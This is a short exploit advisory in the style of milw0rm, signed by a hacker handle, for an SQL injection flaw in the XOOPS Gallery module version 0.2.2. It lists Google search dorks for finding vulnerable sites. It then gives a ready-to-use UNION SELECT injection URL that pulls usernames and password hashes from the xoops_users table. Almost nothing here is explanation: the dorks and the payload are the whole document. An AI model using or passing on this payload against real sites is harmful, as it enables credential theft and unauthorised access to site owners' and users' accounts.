########################################## # # XOOPS Module Gallery 0.2.2 SQL Injection Exploit # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 ####HOME : http://securityreason.com/search/101/c0BidW4=/1/0 # ####MAİL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORKS 1 : allinurl :"modules/gallery" # # DORK 2 : allinurl :"modules/gallery"gid # ########################################### EXPLOIT : modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/* ########################################### ##################S@BUN#################### ########################################### #####hackturkiye.hackturkiye@gmail.com##### ###########################################